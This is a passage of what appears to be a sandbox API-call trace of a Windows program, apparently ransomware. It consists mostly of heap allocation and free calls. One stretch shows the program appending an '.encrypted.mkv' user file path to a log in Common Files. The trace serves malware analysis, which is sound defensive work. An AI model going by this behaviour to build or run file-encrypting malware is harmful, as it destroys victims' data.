(HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.224] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.224] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.225] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.225] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.225] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.225] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.226] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.226] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x33bf, lpOverlapped=0x0) returned 1 [0042.226] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.226] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x33bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.226] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.encrypted.mkv\r\n", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0042.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42) returned 0x88e138 [0042.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.encrypted.mkv\r\n", cchWideChar=66, lpMultiByteStr=0x88e138, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 66 [0042.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0042.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0042.227] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x41, lpOverlapped=0x0) returned 1 [0042.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.227] CloseHandle (hObject=0x140) returned 1 [0042.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.229] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.229] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.231] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.231] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.231] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.231] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af608 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.231] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.234] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 